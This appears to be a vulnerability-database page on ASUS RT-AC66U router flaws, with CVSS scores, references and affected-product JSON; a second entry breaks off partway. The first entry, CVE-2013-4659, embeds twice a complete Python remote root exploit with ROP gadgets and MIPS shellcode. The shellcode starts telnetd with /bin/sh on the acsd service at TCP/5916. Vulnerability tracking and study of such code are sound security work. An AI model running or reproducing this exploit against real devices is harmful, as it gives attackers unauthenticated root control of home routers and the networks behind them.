Search criteria
20 vulnerabilities found for rt-ac66u by asus
VAR-201703-0032
Vulnerability from variot - Updated: 2025-04-21 23:37Buffer overflow in Broadcom ACSD allows remote attackers to execute arbitrary code via a long string to TCP port 5916. This component is used on routers of multiple vendors including ASUS RT-AC66U and TRENDnet TEW-812DRU. The ASUS RT-AC66U is a dual-band wireless router. ASUS RT-AC66U Broadcom acsd Wireless Channel Service (Wireless Channel Servic) has multiple buffer overflow vulnerabilities that allow remote attackers to exploit a vulnerability to submit a malicious request to stop the device from responding or possibly execute arbitrary code. ASUS RT-AC66U is prone to multiple buffer-overflow vulnerabilities. Failed exploit attempts will likely result in denial-of-service conditions. The former is produced by ASUS, and the latter is produced by TRENDnet in the United States. Broadcom ACSD is one of the wireless channel service components. A buffer overflow vulnerability exists in the Broadcom ACSD component used in the ASUS RT-AC66U and TRENDnet TEW-812DRU. #!/usr/bin/env python
import signal, struct from time import sleep from socket import * from sys import exit, exc_info
Title***ASUS RT-AC66U Remote Root Shell Exploit - acsd param command
Discovered and Reported*June 2013
Discovered/Exploited By*Jacob Holcomb/Gimppy and Jacob Thompson
*Security Analsyts @ Independent Security Evaluators
Software Vendor***http://asus.com
Exploit/Advisory**http://securityevaluators.com, http://infosec42.blogspot.com/
Software****acsd wireless service (Listens on TCP/5916)
Firmware Version**3.0.0.4.266 (Other versions were not tested and may be vulnerable)
CVE***ASUS RT-AC66U Multiple Buffer Overflows: CVE-2013-4659
Overview:
The ASUS RT-AC66U contains the Broadcom ACSD Wireless binary that is vulnerable to multiple
Buffer Overflow attacks.
Multiple overflows exist in the following software:
- Broadcom acsd - Wireless Channel Service (autochannel¶m, autochannel&data, csscan&ifname commands)
def sigHandle(signum, frm): # Signal handler
print "\n[!!!] Cleaning up the exploit... [!!!]\n"
sleep(1)
exit(0)
def targServer():
while True:
try:
server = inet_aton(raw_input("\n[*] Please enter the IPv4 address of the ASUS RT-AC66U router:\n\n>"))
server = inet_ntoa(server)
break
except:
print "\n\n[!!!] Error: Please enter a valid IPv4 address. [!!!]\n\n"
sleep(1)
continue
return server
def main():
print ("""\n [*] Title: ASUS RT-AC66U Remote Root Shell Exploit - acsd param command
[] Discovered and Reported: June 2013 [] Discovered/Exploited By: Jacob Holcomb/Gimppy and Jacob Thompson, Security Analysts @ ISE [] Software Vendor: http://asus.com [] Exploit/Advisory: http://securityevaluators.com, http://infosec42.blogspot.com/ [] Software: acsd wireless service (Listens on TCP/5916) [] Firmware Version: 3.0.0.4.266 (Other versions were not tested and may be vulnerable) [*] CVE: ASUS RT-AC66U Broadcom ACSD Buffer Overflow: CVE-2013-4659\n""") signal.signal(signal.SIGINT, sigHandle) #Setting signal handler for ctrl + c victim = targServer() port = int(5916) acsdCmd = "autochannel¶m=" #Vulnerable command - JH
# base address of .text section of libc.so.0 in acsd's address space
libc_base = 0x2ab25000
# ROP gadget #1
# lui s0,0x2
# li a0,1
# move t9,s1
# jalr t9
# ori a1,s0,0x2
ra1 = struct.pack("<L", libc_base + 0x2d39c)
# ROP gadget #2
# move t9,s3
# lw ra,44(sp)
# lw s4,40(sp)
# lw s3,36(sp)
# lw s2,32(sp)
# lw s1,28(sp)
# lw s0,24(sp)
# jr t9
s1 = struct.pack("<L", libc_base + 0x34358)
# sleep() - used to force program context switch (cache flush)
s3 = struct.pack("<L", libc_base + 0x2cb90)
# ROP gadget #3
# addiu a1,sp,24
# lw gp,16(sp)
# lw ra,32(sp)
# jr ra
# addiu sp,sp,40
ra2 = struct.pack("<L", libc_base + 0xa1b0)
# ROP gadget #4
# move t9,a1
# addiu a0,a0,56
# jr t9
# move a1,a2
ra3 = struct.pack("<L", libc_base + 0x3167c)
# jalr sp
jalr_sp = "\x09\xf8\xa0\x03"
JuNk = "\x42" * 510
safeNop = "2Aa3"
#80 Bytes system() Shellcode by Jacob Holcomb of ISE
#Calling system() and executing telnetd -l /bin/sh
shellcode = "\x6c\x6e\x08\x3c\x74\x65\x08\x35\xec\xff\xa8"
shellcode += "\xaf\x64\x20\x09\x3c\x65\x74\x29\x35\xf0\xff"
shellcode += "\xa9\xaf\x20\x2f\x0a\x3c\x2d\x6c\x4a\x35\xf4"
shellcode += "\xff\xaa\xaf\x6e\x2f\x0b\x3c\x62\x69\x6b\x35"
shellcode += "\xf8\xff\xab\xaf\x73\x68\x0c\x24\xfc\xff\xac"
shellcode += "\xaf\xec\xff\xa4\x23\xec\xff\xbd\x23\xb4\x2a"
shellcode += "\x19\x3c\x50\xf0\x39\x37\x09\xf8\x20\x03\x32"
shellcode += "\x41\x61\x33"
sploit = acsdCmd + JuNk + s1 + JuNk[0:4] + s3 + ra1 + JuNk[0:48]
sploit += ra2 + JuNk[0:24]+ jalr_sp + safeNop + ra3 + JuNk[0:4]
sploit += safeNop + shellcode
try:
print "\n [*] Creating network socket."
net_sock = socket(AF_INET, SOCK_STREAM)
except:
print "\n [!!!] There was an error creating the network socket. [!!!]\n\n%s\n" % exc_info()
sleep(1)
exit(0)
try:
print " [*] Connecting to ASUS RT-AC66U router @ %s on port TCP/%d." % (victim, port)
net_sock.connect((victim, port))
except:
print "\n [!!!] There was an error connecting to %s. [!!!]\n\n%s\n" % (victim, exc_info())
sleep(1)
exit(0)
try:
print """ [*] Attempting to exploit the acsd param command.
[] Sending 1337 ro0t Sh3ll exploit to %s on TCP port %d. [] Payload Length: %d bytes.""" % (victim, port, len(sploit)) net_sock.send(sploit) sleep(1) except: print "\n [!!!] There was an error sending the 1337 ro0t Sh3ll exploit to %s [!!!]\n\n%s\n" % (victim, exc_info()) sleep(1) exit(0)
try:
print """ [*] 1337 ro0t Sh3ll exploit was sent! Fingers crossed for code execution!
[*] Closing network socket. Press ctrl + c repeatedly to force exploit cleanup.\n""" net_sock.close() except: print "\n [!!!] There was an error closing the network socket. [!!!]\n\n%s\n" % exc_info() sleep(1) exit(0)
if name == "main": main()
Show details on source website{
"affected_products": {
"_id": null,
"data": [
{
"_id": null,
"model": "rt-ac66u",
"scope": "eq",
"trust": 1.6,
"vendor": "asus",
"version": null
},
{
"_id": null,
"model": "tew-812dru",
"scope": "eq",
"trust": 1.0,
"vendor": "trendnet",
"version": null
},
{
"_id": null,
"model": "rt-ac66u",
"scope": null,
"trust": 0.8,
"vendor": "asustek computer",
"version": null
},
{
"_id": null,
"model": "tew-812dru",
"scope": null,
"trust": 0.8,
"vendor": "trendnet",
"version": null
},
{
"_id": null,
"model": "rt-ac66u",
"scope": "eq",
"trust": 0.6,
"vendor": "asus",
"version": "3.0.0.4.266"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-11043"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-006764"
},
{
"db": "CNNVD",
"id": "CNNVD-201307-627"
},
{
"db": "NVD",
"id": "CVE-2013-4659"
}
]
},
"configurations": {
"_id": null,
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:asus:rt-ac66u_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:trendnet:tew-812dru_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-006764"
}
]
},
"credits": {
"_id": null,
"data": "Jacob Holcomb/Gimppy and Jacob Thompson",
"sources": [
{
"db": "BID",
"id": "61499"
},
{
"db": "CNNVD",
"id": "CNNVD-201307-627"
}
],
"trust": 0.9
},
"cve": "CVE-2013-4659",
"cvss": {
"_id": null,
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CVE-2013-4659",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 1.9,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2013-11043",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "VHN-64661",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"id": "CVE-2013-4659",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.8,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2013-4659",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "NVD",
"id": "CVE-2013-4659",
"trust": 0.8,
"value": "Critical"
},
{
"author": "CNVD",
"id": "CNVD-2013-11043",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201307-627",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-64661",
"trust": 0.1,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2013-4659",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-11043"
},
{
"db": "VULHUB",
"id": "VHN-64661"
},
{
"db": "VULMON",
"id": "CVE-2013-4659"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-006764"
},
{
"db": "CNNVD",
"id": "CNNVD-201307-627"
},
{
"db": "NVD",
"id": "CVE-2013-4659"
}
]
},
"description": {
"_id": null,
"data": "Buffer overflow in Broadcom ACSD allows remote attackers to execute arbitrary code via a long string to TCP port 5916. This component is used on routers of multiple vendors including ASUS RT-AC66U and TRENDnet TEW-812DRU. The ASUS RT-AC66U is a dual-band wireless router. ASUS RT-AC66U Broadcom acsd Wireless Channel Service (Wireless Channel Servic) has multiple buffer overflow vulnerabilities that allow remote attackers to exploit a vulnerability to submit a malicious request to stop the device from responding or possibly execute arbitrary code. ASUS RT-AC66U is prone to multiple buffer-overflow vulnerabilities. Failed exploit attempts will likely result in denial-of-service conditions. The former is produced by ASUS, and the latter is produced by TRENDnet in the United States. Broadcom ACSD is one of the wireless channel service components. A buffer overflow vulnerability exists in the Broadcom ACSD component used in the ASUS RT-AC66U and TRENDnet TEW-812DRU. #!/usr/bin/env python\n\nimport signal, struct\nfrom time import sleep\nfrom socket import *\nfrom sys import exit, exc_info\n\n#\n# Title*******************ASUS RT-AC66U Remote Root Shell Exploit - acsd param command\n# Discovered and Reported*June 2013 \n# Discovered/Exploited By*Jacob Holcomb/Gimppy and Jacob Thompson\n# *Security Analsyts @ Independent Security Evaluators\n# Software Vendor*********http://asus.com\n# Exploit/Advisory********http://securityevaluators.com, http://infosec42.blogspot.com/\n# Software****************acsd wireless service (Listens on TCP/5916)\n# Firmware Version********3.0.0.4.266 (Other versions were not tested and may be vulnerable) \n# CVE*********************ASUS RT-AC66U Multiple Buffer Overflows: CVE-2013-4659\n#\n# Overview:\n#\tThe ASUS RT-AC66U contains the Broadcom ACSD Wireless binary that is vulnerable to multiple \n# Buffer Overflow attacks. \n#\n# Multiple overflows exist in the following software:\n#\n#\t- Broadcom acsd - Wireless Channel Service (autochannel\u0026param, autochannel\u0026data, csscan\u0026ifname commands)\n#\t\t\t\t\t\t\t\t\t\t\t\t\t\t\n\n\ndef sigHandle(signum, frm): # Signal handler\n \n print \"\\n[!!!] Cleaning up the exploit... [!!!]\\n\"\n sleep(1)\n exit(0)\n\n\ndef targServer():\n \n while True: \n try:\n server = inet_aton(raw_input(\"\\n[*] Please enter the IPv4 address of the ASUS RT-AC66U router:\\n\\n\u003e\"))\n server = inet_ntoa(server)\n break\n except:\n print \"\\n\\n[!!!] Error: Please enter a valid IPv4 address. [!!!]\\n\\n\"\n sleep(1)\n continue\n \n return server \n\n\ndef main():\n \n print (\"\"\"\\n [*] Title: ASUS RT-AC66U Remote Root Shell Exploit - acsd param command\n [*] Discovered and Reported: June 2013\n [*] Discovered/Exploited By: Jacob Holcomb/Gimppy and Jacob Thompson, Security Analysts @ ISE\n [*] Software Vendor: http://asus.com\n [*] Exploit/Advisory: http://securityevaluators.com, http://infosec42.blogspot.com/\n [*] Software: acsd wireless service (Listens on TCP/5916)\n [*] Firmware Version: 3.0.0.4.266 (Other versions were not tested and may be vulnerable)\n [*] CVE: ASUS RT-AC66U Broadcom ACSD Buffer Overflow: CVE-2013-4659\\n\"\"\")\n signal.signal(signal.SIGINT, sigHandle) #Setting signal handler for ctrl + c\n victim = targServer()\n port = int(5916)\n acsdCmd = \"autochannel\u0026param=\" #Vulnerable command - JH\n \n # base address of .text section of libc.so.0 in acsd\u0027s address space\n libc_base = 0x2ab25000\n\n # ROP gadget #1\n # lui s0,0x2\n # li a0,1\n # move t9,s1\n # jalr t9\n # ori a1,s0,0x2\n ra1 = struct.pack(\"\u003cL\", libc_base + 0x2d39c)\n\n # ROP gadget #2\n # move t9,s3\n # lw ra,44(sp)\n # lw s4,40(sp)\n # lw s3,36(sp)\n # lw s2,32(sp)\n # lw s1,28(sp)\n # lw s0,24(sp)\n # jr t9\n s1 = struct.pack(\"\u003cL\", libc_base + 0x34358)\n\n # sleep() - used to force program context switch (cache flush)\n s3 = struct.pack(\"\u003cL\", libc_base + 0x2cb90)\n\n # ROP gadget #3\n # addiu a1,sp,24\n # lw gp,16(sp)\n # lw ra,32(sp)\n # jr ra\n # addiu sp,sp,40\n ra2 = struct.pack(\"\u003cL\", libc_base + 0xa1b0)\n\n # ROP gadget #4\n # move t9,a1\n # addiu a0,a0,56\n # jr t9\n # move a1,a2\n ra3 = struct.pack(\"\u003cL\", libc_base + 0x3167c)\n\n # jalr sp\n jalr_sp = \"\\x09\\xf8\\xa0\\x03\"\n \n JuNk = \"\\x42\" * 510\n safeNop = \"2Aa3\"\n\n #80 Bytes system() Shellcode by Jacob Holcomb of ISE\n #Calling system() and executing telnetd -l /bin/sh\n shellcode = \"\\x6c\\x6e\\x08\\x3c\\x74\\x65\\x08\\x35\\xec\\xff\\xa8\"\n shellcode += \"\\xaf\\x64\\x20\\x09\\x3c\\x65\\x74\\x29\\x35\\xf0\\xff\"\n shellcode += \"\\xa9\\xaf\\x20\\x2f\\x0a\\x3c\\x2d\\x6c\\x4a\\x35\\xf4\"\n shellcode += \"\\xff\\xaa\\xaf\\x6e\\x2f\\x0b\\x3c\\x62\\x69\\x6b\\x35\"\n shellcode += \"\\xf8\\xff\\xab\\xaf\\x73\\x68\\x0c\\x24\\xfc\\xff\\xac\"\n shellcode += \"\\xaf\\xec\\xff\\xa4\\x23\\xec\\xff\\xbd\\x23\\xb4\\x2a\"\n shellcode += \"\\x19\\x3c\\x50\\xf0\\x39\\x37\\x09\\xf8\\x20\\x03\\x32\"\n shellcode += \"\\x41\\x61\\x33\"\n\n sploit = acsdCmd + JuNk + s1 + JuNk[0:4] + s3 + ra1 + JuNk[0:48]\n sploit += ra2 + JuNk[0:24]+ jalr_sp + safeNop + ra3 + JuNk[0:4]\n sploit += safeNop + shellcode\n\n try:\n print \"\\n [*] Creating network socket.\"\n net_sock = socket(AF_INET, SOCK_STREAM)\n except:\n print \"\\n [!!!] There was an error creating the network socket. [!!!]\\n\\n%s\\n\" % exc_info() \n sleep(1)\n exit(0) \n\n try:\n print \" [*] Connecting to ASUS RT-AC66U router @ %s on port TCP/%d.\" % (victim, port)\n net_sock.connect((victim, port))\n except:\n print \"\\n [!!!] There was an error connecting to %s. [!!!]\\n\\n%s\\n\" % (victim, exc_info())\n sleep(1)\n exit(0)\n \n try:\n print \"\"\" [*] Attempting to exploit the acsd param command. \n [*] Sending 1337 ro0t Sh3ll exploit to %s on TCP port %d. \n [*] Payload Length: %d bytes.\"\"\" % (victim, port, len(sploit))\n net_sock.send(sploit)\n sleep(1)\n except:\n print \"\\n [!!!] There was an error sending the 1337 ro0t Sh3ll exploit to %s [!!!]\\n\\n%s\\n\" % (victim, exc_info())\n sleep(1)\n exit(0)\n\n try:\n print \"\"\" [*] 1337 ro0t Sh3ll exploit was sent! Fingers crossed for code execution!\n [*] Closing network socket. Press ctrl + c repeatedly to force exploit cleanup.\\n\"\"\"\n net_sock.close()\n except:\n print \"\\n [!!!] There was an error closing the network socket. [!!!]\\n\\n%s\\n\" % exc_info()\n sleep(1)\n exit(0)\n\n\nif __name__ == \"__main__\":\n main()\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2013-4659"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-006764"
},
{
"db": "CNVD",
"id": "CNVD-2013-11043"
},
{
"db": "BID",
"id": "61499"
},
{
"db": "VULHUB",
"id": "VHN-64661"
},
{
"db": "VULMON",
"id": "CVE-2013-4659"
},
{
"db": "PACKETSTORM",
"id": "122562"
}
],
"trust": 2.7
},
"exploit_availability": {
"_id": null,
"data": [
{
"reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=27133",
"trust": 0.2,
"type": "exploit"
},
{
"reference": "https://www.scap.org.cn/vuln/vhn-64661",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-64661"
},
{
"db": "VULMON",
"id": "CVE-2013-4659"
}
]
},
"external_ids": {
"_id": null,
"data": [
{
"db": "NVD",
"id": "CVE-2013-4659",
"trust": 3.6
},
{
"db": "PACKETSTORM",
"id": "122562",
"trust": 2.7
},
{
"db": "BID",
"id": "61499",
"trust": 1.6
},
{
"db": "JVNDB",
"id": "JVNDB-2013-006764",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201307-627",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2013-11043",
"trust": 0.6
},
{
"db": "NSFOCUS",
"id": "24219",
"trust": 0.6
},
{
"db": "EXPLOIT-DB",
"id": "27133",
"trust": 0.2
},
{
"db": "SEEBUG",
"id": "SSVID-80751",
"trust": 0.1
},
{
"db": "SEEBUG",
"id": "SSVID-80752",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-64661",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2013-4659",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-11043"
},
{
"db": "VULHUB",
"id": "VHN-64661"
},
{
"db": "VULMON",
"id": "CVE-2013-4659"
},
{
"db": "BID",
"id": "61499"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-006764"
},
{
"db": "PACKETSTORM",
"id": "122562"
},
{
"db": "CNNVD",
"id": "CNNVD-201307-627"
},
{
"db": "NVD",
"id": "CVE-2013-4659"
}
]
},
"id": "VAR-201703-0032",
"iot": {
"_id": null,
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-11043"
},
{
"db": "VULHUB",
"id": "VHN-64661"
}
],
"trust": 1.1829994849999999
},
"iot_taxonomy": {
"_id": null,
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-11043"
}
]
},
"last_update_date": "2025-04-21T23:37:22.585000Z",
"patch": {
"_id": null,
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "https://www.asus.com/jp/"
},
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.trendnet.com/home"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-006764"
}
]
},
"problemtype_data": {
"_id": null,
"data": [
{
"problemtype": "CWE-119",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-64661"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-006764"
},
{
"db": "NVD",
"id": "CVE-2013-4659"
}
]
},
"references": {
"_id": null,
"data": [
{
"trust": 2.6,
"url": "http://www.linux-magazine.com/issues/2014/161/security-and-soho-routers"
},
{
"trust": 2.6,
"url": "https://packetstormsecurity.com/files/122562/asus-rt-ac66u-acsd-remote-root-buffer-overflow.html"
},
{
"trust": 0.9,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-4659"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-4659"
},
{
"trust": 0.6,
"url": "http://1337day.com/exploit/21033"
},
{
"trust": 0.6,
"url": "http://www.securityfocus.com/bid/61499"
},
{
"trust": 0.6,
"url": "http://www.nsfocus.net/vulndb/24219"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/119.html"
},
{
"trust": 0.1,
"url": "http://tools.cisco.com/security/center/viewalert.x?alertid=33445"
},
{
"trust": 0.1,
"url": "https://www.exploit-db.com/exploits/27133/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "http://asus.com"
},
{
"trust": 0.1,
"url": "http://securityevaluators.com,"
},
{
"trust": 0.1,
"url": "http://infosec42.blogspot.com/"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-11043"
},
{
"db": "VULHUB",
"id": "VHN-64661"
},
{
"db": "VULMON",
"id": "CVE-2013-4659"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-006764"
},
{
"db": "PACKETSTORM",
"id": "122562"
},
{
"db": "CNNVD",
"id": "CNNVD-201307-627"
},
{
"db": "NVD",
"id": "CVE-2013-4659"
}
]
},
"sources": {
"_id": null,
"data": [
{
"db": "CNVD",
"id": "CNVD-2013-11043",
"ident": null
},
{
"db": "VULHUB",
"id": "VHN-64661",
"ident": null
},
{
"db": "VULMON",
"id": "CVE-2013-4659",
"ident": null
},
{
"db": "BID",
"id": "61499",
"ident": null
},
{
"db": "JVNDB",
"id": "JVNDB-2013-006764",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "122562",
"ident": null
},
{
"db": "CNNVD",
"id": "CNNVD-201307-627",
"ident": null
},
{
"db": "NVD",
"id": "CVE-2013-4659",
"ident": null
}
]
},
"sources_release_date": {
"_id": null,
"data": [
{
"date": "2013-08-01T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-11043",
"ident": null
},
{
"date": "2017-03-14T00:00:00",
"db": "VULHUB",
"id": "VHN-64661",
"ident": null
},
{
"date": "2017-03-14T00:00:00",
"db": "VULMON",
"id": "CVE-2013-4659",
"ident": null
},
{
"date": "2013-07-29T00:00:00",
"db": "BID",
"id": "61499",
"ident": null
},
{
"date": "2017-04-05T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-006764",
"ident": null
},
{
"date": "2013-07-26T20:22:22",
"db": "PACKETSTORM",
"id": "122562",
"ident": null
},
{
"date": "2013-07-29T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201307-627",
"ident": null
},
{
"date": "2017-03-14T09:59:00.160000",
"db": "NVD",
"id": "CVE-2013-4659",
"ident": null
}
]
},
"sources_update_date": {
"_id": null,
"data": [
{
"date": "2013-08-01T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-11043",
"ident": null
},
{
"date": "2017-03-15T00:00:00",
"db": "VULHUB",
"id": "VHN-64661",
"ident": null
},
{
"date": "2017-03-15T00:00:00",
"db": "VULMON",
"id": "CVE-2013-4659",
"ident": null
},
{
"date": "2013-07-31T12:25:00",
"db": "BID",
"id": "61499",
"ident": null
},
{
"date": "2017-04-05T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-006764",
"ident": null
},
{
"date": "2017-03-15T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201307-627",
"ident": null
},
{
"date": "2025-04-20T01:37:25.860000",
"db": "NVD",
"id": "CVE-2013-4659",
"ident": null
}
]
},
"threat_type": {
"_id": null,
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "122562"
},
{
"db": "CNNVD",
"id": "CNNVD-201307-627"
}
],
"trust": 0.7
},
"title": {
"_id": null,
"data": "ASUS RT-AC66U and TRENDnet TEW-812DRU Used by multiple vendor routers including Broadcom ACSD Vulnerable to buffer overflow",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-006764"
}
],
"trust": 0.8
},
"type": {
"_id": null,
"data": "buffer overflow",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201307-627"
}
],
"trust": 0.6
}
}
VAR-201707-0387
Vulnerability from variot - Updated: 2025-04-20 23:36Global buffer overflow in networkmap in Asuswrt-Merlin firmware for ASUS devices and ASUS firmware for ASUS RT-AC5300, RT_AC1900P, RT-AC68U, RT-AC68P, RT-AC88U, RT-AC66U, RT-AC66U_B1, RT-AC58U, RT-AC56U, RT-AC55U, RT-AC52U, RT-AC51U, RT-N18U, RT-N66U, RT-N56U, RT-AC3200, RT-AC3100, RT_AC1200GU, RT_AC1200G, RT-AC1200, RT-AC53, RT-N12HP, RT-N12HP_B1, RT-N12D1, RT-N12+, RT_N12+_PRO, RT-N16, and RT-N300 devices allows remote attackers to write shellcode at any address in the heap; this can be used to execute arbitrary code on the router by hosting a crafted device description XML document at a URL specified within a Location header in an SSDP response. ASUSRT-AC5300 and others are wireless routers from ASUS. A networkmap is one of the network diagram components. A buffer overflow vulnerability exists in networkmaps in several ASUS products
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201707-0387",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "rt-ac68u",
"scope": "lte",
"trust": 1.0,
"vendor": "asuswrt merlin",
"version": "3.0.0.4.380.7743"
},
{
"model": "rt-n12\\+",
"scope": "lte",
"trust": 1.0,
"vendor": "asuswrt merlin",
"version": "3.0.0.4.380.7378"
},
{
"model": "rt-n56u",
"scope": "lte",
"trust": 1.0,
"vendor": "asuswrt merlin",
"version": "3.0.0.4.378.7177"
},
{
"model": "rt-ac66u",
"scope": "lte",
"trust": 1.0,
"vendor": "asuswrt merlin",
"version": "3.0.0.4.380.7743"
},
{
"model": "rt-ac5300",
"scope": "lte",
"trust": 1.0,
"vendor": "asuswrt merlin",
"version": "3.0.0.4.380.7743"
},
{
"model": "rt-n18u",
"scope": "lte",
"trust": 1.0,
"vendor": "asuswrt merlin",
"version": "3.0.0.4.380.7743"
},
{
"model": "rt ac1200g",
"scope": "lte",
"trust": 1.0,
"vendor": "asuswrt merlin",
"version": "3.0.0.4.380.3167"
},
{
"model": "rt ac1900p",
"scope": "lte",
"trust": 1.0,
"vendor": "asuswrt merlin",
"version": "3.0.0.4.380.7743"
},
{
"model": "rt-ac56u",
"scope": "lte",
"trust": 1.0,
"vendor": "asuswrt merlin",
"version": "3.0.0.4.380.7743"
},
{
"model": "rt-n12hp",
"scope": "lte",
"trust": 1.0,
"vendor": "asuswrt merlin",
"version": "3.0.0.4.380.2943"
},
{
"model": "rt ac1200gu",
"scope": "lte",
"trust": 1.0,
"vendor": "asuswrt merlin",
"version": "3.0.0.4.380.5577"
},
{
"model": "rt-n12hp b1",
"scope": "lte",
"trust": 1.0,
"vendor": "asuswrt merlin",
"version": "3.0.0.4.380.3479"
},
{
"model": "rt-ac51u",
"scope": "lte",
"trust": 1.0,
"vendor": "asuswrt merlin",
"version": "3.0.0.4.380.7378"
},
{
"model": "rt-n16",
"scope": "lte",
"trust": 1.0,
"vendor": "asuswrt merlin",
"version": "3.0.0.4.380.7378"
},
{
"model": "rt-ac3100",
"scope": "lte",
"trust": 1.0,
"vendor": "asuswrt merlin",
